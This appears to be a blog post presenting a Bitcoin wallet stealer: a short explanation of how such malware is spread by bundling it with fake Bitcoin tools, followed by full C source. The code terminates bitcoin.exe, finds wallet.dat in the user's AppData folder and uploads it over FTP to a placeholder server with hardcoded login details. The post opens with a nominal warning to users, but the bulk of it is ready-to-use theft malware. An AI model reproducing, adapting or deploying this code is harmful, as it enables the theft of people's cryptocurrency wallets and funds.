Bitcoin Wallet Stealer Info + > Source Code


The process is easy, this tiny C program look inside your computer appdata folder, if it finds the wallet.dat file, it uploads it into the hacker server using FTP, or file transfer protocol, the stealer it self is a virus, a hacking tool, a malware or you can name it what ever you want, because hackers use the same source but add features like infection spreading, USB spreading and that makes it more dangerous, same meaning, different names.

How hackers spread this stealer to the Bitcoin users, how they know I have Bitcoin?
well it's not so hard, bind the virus with a program that is related to Bitcoin, like "Bitcoin Stealer Maker" it self, and when someone download it, he lose his wallet.

the idea is that you should worry about your wallet, a virus can infect you one way or another, no matter if you are protected or not, people will always find a way to make the bitcoin virus FUD "Fully Undetectable" that makes it virtually impossible to notice.


-CODE-

#include <windows.h>
        #include <tlhelp32.h>
        #include <tchar.h>
     
        #include <wininet.h>
        #include <ctime>
        #include <iostream>
        #pragma comment(lib, "wininet")
     
        void killprocess()
        { 
                HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
                // Get the process list snapshot.
                PROCESSENTRY32 ProcessEntry = { 0 };
                // Initialize the process entry structure.
                ProcessEntry.dwSize = sizeof( ProcessEntry );
                // Get the first process info
                BOOL Return = FALSE;
                Return = Process32First( hProcessSnapShot,&ProcessEntry );
                int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
                if (value==0)
                {
                        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
                        //Open Process to terminate
                        TerminateProcess(hProcess,0);
                        CloseHandle(hProcess); //Close Handle }
                }
                while( Process32Next( hProcessSnapShot, &ProcessEntry ));
                CloseHandle( hProcessSnapShot );
        }
     
        int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
        {
                killprocess();
                Sleep(40000);
                srand((unsigned)time(NULL));                    // we get time to use for random seed
                int seedone=rand();                                             // seed one
                int seedtwo=rand()*3;                                   // seed two times 3
                int seedboth = seedone + seedtwo;               // combine seeds to ensure random int
                // now we need to convert int to char
                char randomseed[99];                                    // make randomseed buffer at 99 to prevent overflow
            itoa(seedboth,randomseed,10);                       // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
                // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
           
                char* appdata = getenv("APPDATA");              //Gets %Appdata% path
                char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
     
                //ftp connection
                HINTERNET hInternet;
                HINTERNET hFtpSession;
                hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
                hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
     
                FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
                FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
     
                InternetCloseHandle(hFtpSession);
                InternetCloseHandle(hInternet);
           
                return 0;
        }




Full credit gose to :  *Code 127.0.0.1*

No comments:

Post a Comment

What is Prototype content functions in JavaScript Framework Programming.mp4

  Download now Enjoy! Follow us for more...